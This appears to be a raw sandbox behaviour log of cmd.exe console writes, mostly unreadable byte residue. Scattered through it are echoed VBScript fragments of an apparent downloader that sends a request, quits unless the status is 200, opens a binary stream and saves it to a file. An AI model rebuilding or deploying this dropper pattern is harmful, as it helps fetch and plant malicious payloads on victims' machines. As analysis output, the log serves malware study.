Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p...0....................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...6.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...<.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...B.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...H...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...g...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...s............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...y....................................xH.<..J.....b.v..3|..+.....Z....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.2...S.e.n.d. . ....................xH.<..J.....b.v..3|..+.\.+.&....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................e.n.d. . .................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... .................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................... .................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .G.e.a.r. .=. .m.y.S.e.t.t.i.n.g.s.2...S.t.a.t.u.s. . ..xH.<..J.....b.v..3|..+.\.+.8....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................i.n.g.s.2...S.t.a.t.u.s...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................2...S.t.a.t.u.s...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................2...S.t.a.t.u.s...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...#...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...B...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p...N............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p...T....................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...Z.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...`.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...f.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...l...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .I.f. .G.e.a.r. .<.>. .2.0.0. .T.h.e.n. . ..............xH.<..J.....b.v..3|..+.\.+.,....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................0. .T.h.e.n. . ...........3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................e.n. . ...........3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................e.n. . ...........3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . . . .W.S.c.r.i.p.t...Q.u.i.t. .1. . ..................xH.<..J.....b.v..3|..+.\.+.(....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................i.t. .1. . ...............3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... . ...............3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...$............................... . ...............3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...*...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...I...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...U............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .E.n.d. .I.f. . ...[....................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...a.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...g.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...m.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...s...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p........................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p........................................xH.<..J.....b.v..3|..+.....b....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...$...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...0............................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...6.............................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...[.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...P...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...\............................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...b.............................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...`.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...y...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...e.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...j.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...O.p.e.n. . ....................xH.<..J.....b.v..3|..+.\.+.&....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................p.e.n. . .................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... .................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................... .................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p... ............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...T.y.p.e. .=. .1. . ............xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...,...........................y.p.e. .=. .1. . .........3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...2...........................=. .1. . .........3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...8...............................=. .1. . .........3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...>...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...{...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p........................................xH.<..J.....b.v..3|..+.....Z....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...P.o.s.i.t.i.o.n. .=. .0. . ....xH.<..J.....b.v..3|..+.\.+.6....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................o.s.i.t.i.o.n. .=. .0. ...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................i.o.n. .=. .0. ...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................i.o.n. .=. .0. ...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.......................................B.a.....x.H.......3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.............B.a.....x.H.......3|l.+.|.\...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p........................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...%.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...+.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...1.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...7...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...b............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...h....................................xH.<..J.....b.v..3|..+.....~....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...n.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...t.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...z.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.6.9.2.4.2.6.9.1.2.7.9.6.8.4.7.5................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.1.6.6.1.8.6.6.1.7.3.2.7.1.9.5.1................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.4.8.4.5.4.1.1.5.5.5.8.8.6.9.1.4................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.......................................B.a.......F.......3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.............B.a.......F.......3|l.+.|.\...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.8.7.8.3.9.4.2.2.5.8.2.1.1.4.7.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.../.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...F...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.3.3.1.7.7.2.6.3.9.2.4.3.4.9.7.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...X.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...w...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.4.7.7.4.1.6.9.2.2.4.8.3.9.6.3.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.5.2.1.7.9.2.5.7.9.5.3.2.7.4.8.3.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.7.7.6.1.7.9.7.2.5.2.4.8.2.4.6.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.3.1.2.6.1.2.4.2.3.3.2.9.1.2.7.1.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.1.9.4.5.6.9.4.7.6.7.6.5.8.5.3.6.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...-.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...D...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.2.5.5.5.2.3.5.7.5.9.1.4.1.7.3.9.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...m...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...y.............................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.........................................I.<..J.....b.v..3|..+..........E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p.................................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...S.a.v.e.T.o.F.i.l.e. .c.o.n.c.e.p.t. . ....b.v..3|..+.\.+.B....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................a.v.e.T.o.F.i.l.e. .c.o...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................o.F.i.l.e. .c.o...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................o.F.i.l.e. .c.o...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p.................................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...C.l.o.s.e. . ...................I.<..J.....b.v..3|..+.\.+.(....E.J....T.+.Jump to behavior
